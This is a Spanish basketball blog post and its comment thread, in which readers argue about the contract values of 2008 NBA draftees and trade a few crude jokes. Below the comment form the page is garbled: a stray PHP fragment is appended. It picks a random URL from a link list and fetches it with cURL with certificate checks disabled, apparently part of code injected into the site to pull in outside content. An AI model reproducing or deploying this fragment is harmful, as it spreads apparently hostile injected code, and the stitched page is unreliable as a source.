La pregunta

19 de January de 2012 por txusma

¿Por cuánto renovaríais a los jugadores del draft de 2008?

Comenta

24 comentarios a esta entrada

  1. ralage dice:
    #1

    Viendo la lista diría:

    El máximo solo a DRose,
    un escalón por debajo(12.5-15M): Eric Gordon, Love, Hibbert,Westbrook
    despúes (10- 12.5M)Gallinari,Brook Lopez
    (5 y 10M) Beasley, Ibaka, Batum, George Hill y McGee (q los hará aunque tal vez no se los merezca)
    Menos de 5, pero con algún valor: OJ Mayo, Ryan Anderson

      Citar

  2. Sancho88 dice:
    #2

    Derrick Rose – Lo que él pidiese. Si quiere un unicornio, un pony para su hija y una isla artificial en Dubai, no sería yo quien se lo negara.

    Michael Beasley – A este directamente no le renovaría. Me despediría de él con lágrimas en los ojos de felicidad y después montaría una fiesta con una cheerleader del gran canaria que tuviese una pistola guardada dentro del tanga para cargarse a Wes Johnson durante la fiesta

    O.J. Mayo – Me parece que este no va a querer seguir siendo osito ni de coña. Además, creo que será de los agentes libres más cotizados. Puede ser un ‘bombazo’ para equipos como LA Clippers o Chicago

    Russell Westbrook – El nombradísimo Russell Westrook. Sin volvernos locos, yo creo que 15 kilos por temporada los vale

    Kevin Love – (Ver emolumentos de Derrick Rose, y añadir como regalo a O.J. Mayo y un pívot de garantías para que opten realmente a PO).

    Danillo Gallinari – 8-9 KILOS

    Eric Gordon – Quién sabe… lo que diga Stern. Para hacerle un favor al chico le tendrían que dejar volver a Clippers…

    Joe Alexander – Un zurullo embuelto en papel albal, y si no lo quiere, mandaría a Lendoiro para convencerle en una cena hasta las cinco de la mañana

    Que siga otro la lista que me canso, jee

      Citar

  3. guisante dice:
    #3

    Sancho88,
    +1000.

    A Beasley se le renueva hombre. Con los buenos momentos que nos ha dado… http://cache.gawkerassets.com/assets/images/11/2012/01/300da11c104f3d748df049064e8f6340.jpg

      Citar

  4. Sancho88 dice:
    #4

    que moñas, mira que no aprovechar el típico momento “muchacha que está buena, también está borracha, esta noche arde parís y mañana no se va a acordar…” En fin. A quién no le ha pasado la típica que piensas que te has liado con una tía que esta buena y al día siguiente tienes un mensaje por el facebook de una gorda impune que reclama la autoría del crimen?

      Citar

  5. Txusma dice:
    #5

    Bueno, pues parece que Westbrook renueva a cambio de 80 kilos x 5 años. A Kevin Love, los Wolves le han ofrecido 60 kilos x 4 años. Yo creo q estos 2 están a un nivel parecido. Kevin Love mola mucho pero aún tiene que mejorar algunas cosas como la defensa.
    Como quedará para mi el tema:

    Máximo para Rose
    2ª escalón: Westbrook, Love
    3º escalón: Gallinari, Hibbert, Gordon, Lopez, McGee
    4º escalón: Beasley, Mayo (y se iban a comer el mundo estos 2), Ibaka
    5ª escalón: Ryan Anderson, George Hill, Batum

      Citar

  6. Sancho88 dice:
    #6

    Bueno, de nuevo debo rendir pleitesía a lo que aprendo con vosotros macho. Lo de los escalones salariales, por ejemplo. Ahora ya sé una cosa más sobra la nba que no sabía. Y sabiendo esto, jeje, debo decir que yo pondría a Mayo por encima de Beasley, y también a Ryan Anderson. Mayo está infrautilizado en los grizzlies, ya demostró sin Gay que es capaz de ser un jugador constante por encima de los 20 puntos, y de estos no hay muchos en la liga. Y considero de locos que Beasley cobre más que Anderson, que está demostrando un temporadón. Vamos, que se está ganando una renovación de muchos kilates, ahora me lo explico todo… xd.

    por cierto, +1000000000000000000000000000 para el aficionado del Carpena que lleva el la camiseta de los Kings. Aficionado del Unicaja y encima de los Kings. INSUPERABLE!!

      Citar

  7. HisRoyalAirness dice:
    #7

    Estoy con Sancho en la mayoría y añado:

    Love está demostrando que merece el máximo. Si no se lo dan, se van a arrepentir.
    OJ Mayo en un equipo con minutos creo que rozaría el All-STar (no, no me estoy volviendo loco).
    Gallinari es un jugador muy útil, sus 8 kilitos los vale.
    Beasley que cambie de aires y espabile

      Citar

  8. Denise dice:
    #8

    Sancho88:

    por cierto, +1000000000000000000000000000 para el aficionado del Carpena que lleva el la camiseta de los Kings. Aficionado del Unicaja y encima de los Kings. INSUPERABLE!!

    jajaja yo tambien lo he visto, que partidazo de Luka Zoric (32 puntos, 9 rebotes y zampandose a todos los pivots blancos) y que mala suerte al final que haya perdido el Unicaja con el tiro de Mirotic a falta de 5 décimas.

    Y en el baloncesto europeo y nacional parece que hay una regla no escrita: Todo forcejeo ó balon que salga por la linea y sea dudoso será automaticamente favorable para el Madrid.

      Citar

  9. Denise dice:
    #9

    15 kilos: Derrick Rose
    10-12 kilos: Kevin Love, Eric Gordon, Rusell Westbrook y Javale McGee (es muy bueno, una de mis debilidades junto con Marcin Gortat)
    8 kilos: Hibbert, Ibaka y Brook Lopez (los cms se pagan muy caro)
    5 kilos: para Batum, Gallinari, Ryan Anderson, George Hill

    A Beasley y a Mayo ni agua

      Citar

  10. melo15 dice:
    #10

    A Rose de todo, si quiere a mi mujer también.
    A Love y a Russel y Gordon tambien 12-15 kilos.
    A Hibbert, Lopez, Gallinari 8 kilos
    Mayo le renovaria, seguro, en su temporada Rookie demostro, que es un jugador con una clase brutal.
    Y por ultimo, yo si fuera Beasley, me iria a los Suns, porque Bealey seria bastante buen ejecuto no? En plan Marion

      Citar

  11. dsromero dice:
    #11

    HisRoyalAirness:
    Estoy con Sancho en la mayoría y añado:

    Love está demostrando que merece el máximo. Si no se lo dan, se van a arrepentir.
    OJ Mayo en un equipo con minutos creo que rozaría el All-STar (no, no me estoy volviendo loco).
    Gallinari es un jugador muy útil, sus 8 kilitos los vale.
    Beasley que cambie de aires y espabile

    Creo que esto es lo que más concuerda con lo que yo opino, un tio como Love vale el máximo, Mayo sería una buena carta para un buen sign and trade para este año si no quieren sacarle más rendimiento en los ositos.
    algo parecido con Beasley teniendo al rookie Williams seguro que encuentran equipos dispuestos a dar cosillas por el.

    Incluso renovaría a Hibbert con un buen contrato, que no se por que pero me da que este tio en cualquier momento puede explotar

      Citar

  12. ralage dice:
    #12

    Yo no es que no quiera darle el máximo a Love , que claro que es un jugadorazo, pero creo que el máximo debería ser la frontera que separa a los jugadores que hacen ganar a sus equipos y los que no (aún entendiendo que eso no depende de un solo jugador).

    Por cierto viendo las renovaciones de pivots que hubo este verano, es imposible que a Hibbert no le den más de 10M

      Citar

  13. Txusma dice:
    #13

    Me gusta el comentario de Ralage, el máximo para los verdaderos jugadores franquicia y Kevin Love todavía no ha demostrado que lo sea. Sus actuaciones son monstruosas pero a nivel de equipo no ha hecho más que Gasol en su equipo rookie, por ejemplo.
    Y viendo los comentarios creo que por aquí se sobrevalora bastante a Eric Gordon, un jugador que es incapaz de no perderse menos de 20 partidos por temporada no puede cobrar lo mismo que Love o Westbrook.
    Y venga Denise, que pongas a Gallinari al mismo nivel que Batum y Geoge Hill… Me da un poco la risa. (ya lo de ver a McGee por encima de Hibbert ni lo mento) 😀

    Ah! Y sancho esto de las escalones es una forma de hablar. No hay reglas NBA en este sentido.

      Citar

  14. melo15 dice:
    #14

    Tienes razon, Gordon 8.
    Pero Hibbert es tan bueno

      Citar

  15. Viva_Dirk dice:
    #15

    Bueno flipo bastante con que no penseis que Love merece el máximo, en su tercer año hizo 20-15 y este año está en 25-15, si este tio no se merece el máximo no se quien lo merece. Y para colmo es cualquier cosa menos un hace números, ha mejorado su tiro de tres y asume siempre la responsabilidad.

    En cambio el contrato de Westbrook si me parece un pasote, 80 kilos por 5 años que van a dejar a la franquicia sin casi posibilidades de fichar. Y les falta renovar a Ibaka&Harden en breve, y el español se lleva un contrato de entre 8-10 kilos fijo.

    Del resto la mayoría no son lo suficientemente buenos como para contratos similares, pero:
    – Los centers(Hibbert, Brook Lopez y McGee) se llevaran en torno a 12 kilos por año fijo, además en mi opinión lo merecen.

    – Gordon como comenta Txus no aguanta físicamente bien ninguna temporada, cuando esta bien es un jugadorazo y normalmente no se fijan demasiado en eso en USA, asi que creo que otro contrato de 10-12 kilos fijo.

    – Gallinari esta haciendo su mejor año y los Nuggets soltaron a Melo con el como principal moneda de cambio, aun así sus prestaciones no dan para mas de un contrato de 8 kilos. Mas o menos por ahí andaran tambien tios como OJ Mayo, Batum, DJ Augustin y Ryan Anderson, cada uno por distintos motivos.

    No se quien tendrá la necesidad de un tio como Beasley y no soy capaz de ponerle cifras, como tampoco me aventuro a saber hasta donde pueden pagar un solo año bueno de DJ White.

      Citar

  16. Denise dice:
    #16

    Txusma:
    Y venga Denise, que pongas a Gallinari al mismo nivel que Batum y Geoge Hill… Me da un poco la risa. (ya lo de ver a McGee por encima de Hibbert ni lo mento)

    Gallinari es especialista en maquillar estadísticas, un autentico hace-números. No digo que sea malo, pero tampoco es tan bueno como sus sestadisticas indican. Si me dan a elegir entre él y Batum, para mi equipo escogería al francés sin ninguna duda.
    Y entre McGee e Hibbert, prefiero a McGee. Si Howard se marchara de Orlando en verano, iría de cabeza a por el bueno de Javale McGee. Jugón !!

      Citar

  17. Txusma dice:
    #17

    Denise: Gallinari es especialista en maquillar estadísticas, un autentico hace-números. No digo que sea malo, pero tampoco es tan bueno como sus sestadisticas indican. Si me dan a elegir entre él y Batum, para mi equipo escogería al francés sin ninguna duda.
    Y entre McGee e Hibbert, prefiero a McGee. Si Howard se marchara de Orlando en verano, iría de cabeza a por el bueno de Javale McGee. Jugón !!

    McGee debe ser de los jugadores con menos IQ de toda la liga. Eso sí, condiciones físicas tiene muchas.

      Citar

  18. melo15 dice:
    #18

    Pero Hibbert, no tiene fisico??

      Citar

  19. HisRoyalAirness dice:
    #19

    Viva_Dirk:
    Bueno flipo bastante con que no penseis que Love merece el máximo, en su tercer año hizo 20-15 y este año está en 25-15, si este tio no se merece el máximo no se quien lo merece. Y para colmo es cualquier cosa menos un hace números, ha mejorado su tiro de tres y asume siempre la responsabilidad.

    En cambio el contrato de Westbrook si me parece un pasote, 80 kilos por 5 años que van a dejar a la franquicia sin casi posibilidades de fichar. Y les falta renovar a Ibaka&Harden en breve, y el español se lleva un contrato de entre 8-10 kilos fijo.

    Del resto la mayoría no son lo suficientemente buenos como para contratos similares, pero:
    – Los centers(Hibbert, Brook Lopez y McGee) se llevaran en torno a 12 kilos por año fijo, además en mi opinión lo merecen.

    – Gordon como comenta Txus no aguanta físicamente bien ninguna temporada, cuando esta bien es un jugadorazo y normalmente no se fijan demasiado en eso en USA, asi que creo que otro contrato de 10-12 kilos fijo.

    – Gallinari esta haciendo su mejor año y los Nuggets soltaron a Melo con el como principal moneda de cambio, aun así sus prestaciones no dan para mas de un contrato de 8 kilos. Mas o menos por ahí andaran tambien tios como OJ Mayo, Batum, DJ Augustin y Ryan Anderson, cada uno por distintos motivos.

    No se quien tendrá la necesidad de un tio como Beasley y no soy capaz de ponerle cifras, como tampoco me aventuro a saber hasta donde pueden pagar un solo año bueno de DJ White.

    Amén.
    Para mí Love es un fuera de serie que merece el máximo. Lleva 3 años en la liga, TRES! Y ya ha sido All-Star y máximo reboteador. Trabaja para suplir sus carencias como un animal y dicen que es uno de los tipos más “estudiosos” del basket que hay.
    Con él, Ricky y Williams (no sé por qué le está dando tan poca bola Adelman) tienen mimbres de sobra para soñar.
    Y añado a Pekovic, que va a ser titular en, máximo, 3 partidos

      Citar

  20. RSB dice:
    #20

    Estoy de acuerdo con algunas opiniones, pero en general me parece que renováis muy barato. Puede que sea el precio justo, pero estas cosas no suelen ir así. Solo hay que ver algunas de las renovaciones post-lockout (Chandler, Nené, Marc, Affalo) o contrataciones como la de Dalembert o K. Brown.

    Rose está claro que se llevará el tope. Love, es posible que lo roce. Yo personalmente no lo considero ni un jugador franquicia ni un top 10 (ni mucho menos el mejor 4 de la liga). Sus cifras son acojonantes pero su rendimiento a la hora de la verdad no es tal (es genial pero no un franquicia todavía). ¿Cuál es el tope que podría cobrar? (su precio justo oscilaría los 18k)

    A partir de ahí, nombres que han ido saliendo:

    -Gordon (estimo unos 13k al año de media. Tiene mucho futuro y cotizará al alza)
    -Hibbert (15k. Una burrada, pero es posible que incluso más, está teniendo buenos números y es un 5 de nivel y muy alto, una especie en extención en esta liga que se paga a precio de oro).
    -Westbrook: 15,6k de media. No lo iban a sacar por menos de 15, movimiento lógico pese a las dudas en su dirección
    -Gallinari: unos 10.5
    -B. López: Las lesiones lo han lastrado y va perdiendo fuelle, pero si no es capaz de sacarse mínimo 13k en esta liga, apaga y vámonos
    -McGee: unos 11 (me sorprendería que dieran más)

    -Beasley: mucho talento, nula cabeza. Lo mejor para Minnesota sería traspasarlo y buscar un 5 (¿pero quién te va a dar un 5 hoy día? A nadie le sobran). Aún así cuando renueve 10k los podría sacar a la mínima que se luzca en unos cuantos partidos.
    -OJ Mayo: Entorno a los 9k. Otro caso de Carpantitis aguda. Pero es un jugón. De aquí a 2 años su contrato puede ser una ganga si explota de titular como podría pasar en otra parte. No lo dejaría marchar a cambio de nada, sería un error.

    -Batum y DJ Agustin (entorno 8-8.5 k). Ryan Anderson 7. Ibaka 5.5. G. Hill 4.5

      Citar

  21. RSB dice:
    #21

    Aunque ahora que lo miro, no he respondido a la pregunta, ya decía yo que tirabáis bajo, xD. Yo he puesto a cuánto creo que renovarán, no a cuánto los renovaría (aunque si vienen otras ofertas superiores, a veces no quedan más huevos)

      Citar

  22. Txusma dice:
    #22

    Danilo Gallinari renueva por los Nuggets durante 4 años a cambio de 42 millones de dólares. Los 8 kilos que comentábamos. Creo q le va salir barato a Denver

      Citar

  23. Txusma dice:
    #23

    Y Kevin Love tb ha renovado. 60 millones x 4 años, con la gracia que el último es una Player Option. No es el máximo…
    En cambio los Magic no renuevan a Ryan Anderson y este saldrá al mercado de agentes libres este verano

      Citar

  24. Sancho88 dice:
    #24

    Pues Anderson les vendría muy bien a los Lakers, en mi opinión. No creo que Pau se quede un año más ahí, con el sistema de Brown él sobra. Quiere basarlo todo en Bryant y en Bynum por dentro, con Anderson jugando de cuatro abierto, y con ese dinero que se ahorran con Pau, por fin hacer frente al problema básico del equipo: la dirección. No sé como veis vosotros esta opción

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>